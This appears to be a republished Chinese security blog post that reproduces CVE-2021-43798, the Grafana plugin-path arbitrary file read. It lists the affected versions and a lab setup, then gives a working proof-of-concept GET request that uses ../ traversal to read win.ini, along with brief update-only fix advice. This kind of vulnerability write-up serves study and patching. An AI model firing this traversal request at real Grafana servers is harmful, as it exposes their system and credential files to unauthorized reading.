【漏洞复现】Grafana 任意文件读取漏洞(CVE-2021-43798)

admin 2023年11月1日14:48:01评论54 views字数 661阅读2分12秒阅读模式
声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。

0X01 简介

Grafana是一个开源的度量分析与可视化套件。经常被用作基础设施的时间序列数据和应用程序分析的可视化,它在其他领域也被广泛的使用包括工业传感器、家庭自动化、天气和过程控制等。

官网:
https://grafana.com/

漏洞编号:
CVE-2021-43798

影响范围:
8.0.0-beta1 <= Grafana < 8.0.7
8.1.X <= Grafana < 8.1.8
8.2.X <= Grafana < 8.2.7
8.3.X <= Grafana < 8.3.1

复现环境:

Grafana 8.2.6


0X02 漏洞复现

POC:

GET /public/plugins/logs/../../../../../../../../../../../../../../../../../../../../../../Windows/win.ini HTTP/1.1Host: 192.168.245.134:3000Content-Length: 2
注:Windows系统搭建的好像无法带盘符读取,也可能是我方式不对
【漏洞复现】Grafana 任意文件读取漏洞(CVE-2021-43798)
【漏洞复现】Grafana 任意文件读取漏洞(CVE-2021-43798)

带盘符读取:

【漏洞复现】Grafana 任意文件读取漏洞(CVE-2021-43798)

其他路径可以在这里查询/public/plugins/后面接上插件名称(不包含空格),存在一些默认安装的插件。

【漏洞复现】Grafana 任意文件读取漏洞(CVE-2021-43798)
【漏洞复现】Grafana 任意文件读取漏洞(CVE-2021-43798)


0X03 修复建议

更新至最新版!

0X04 写在最后

回复“加群”,获取群号。

侵删!

原文始发于微信公众号(皓月的笔记本):【漏洞复现】Grafana 任意文件读取漏洞(CVE-2021-43798)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月1日14:48:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】Grafana 任意文件读取漏洞(CVE-2021-43798)https://cn-sec.com/archives/2165479.html

发表评论

匿名网友 填写信息